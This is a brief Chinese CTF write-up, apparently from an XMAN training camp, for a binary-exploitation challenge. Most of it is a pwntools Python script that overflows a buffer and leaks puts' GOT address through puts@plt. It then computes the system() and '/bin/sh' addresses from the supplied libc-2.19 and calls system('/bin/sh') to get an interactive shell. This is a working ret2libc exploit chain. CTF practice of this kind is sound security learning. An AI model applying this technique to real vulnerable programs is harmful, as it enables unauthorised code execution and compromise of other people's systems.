坑:记住是/bin/sh,不是bin/sh啊啊啊
这道题的思路是先通过溢出使得游戏流程能够执行到到finger,首先劫持ret puts出(puts_addr+next_func_addr+argu)puts got plt表,再在对方服务器libc的帮助下,算出system puts偏移获得system实际地址,再如puts进行shell调用
from pwn import *
io=process("./2419") //题目为xman ctf训练营puts_got=0x0804A01C
puts_plt=0x08048490
finger=0x08048765
libc = ELF('./libc-2.19.so')
def readuntil(delim):
data=io.recvuntil(delim);
return data;
print readuntil('\n')
payload1 = ''
payload1 += 'campmates'
payload1 += 'A' * 81+ 'good'
print payload1
io.sendline(payload1)
readuntil('cloth')
readuntil('\n')
payload2="A"*25+p32(puts_plt)+p32(finger)+p32(puts_got)
#print payload2
io.sendline(payload2)
p=readuntil('\n')
print "plt:"+p
puts_addr=u32(p[4:8])
print hex(puts_addr)
system_addr=puts_addr-libc.symbols['puts']+ libc.symbols['system']
print hex(system_addr)
bin_addr=puts_addr-libc.symbols['puts']+ list(libc.search('/bin/sh'))[0]
print hex(bin_addr)
print readuntil('cloth')
readuntil('\n')
payload3="A"*25+p32(system_addr)+p32(finger)+p32(bin_addr)
io.sendline(payload3)
#print readuntil('\n')
io.interactive()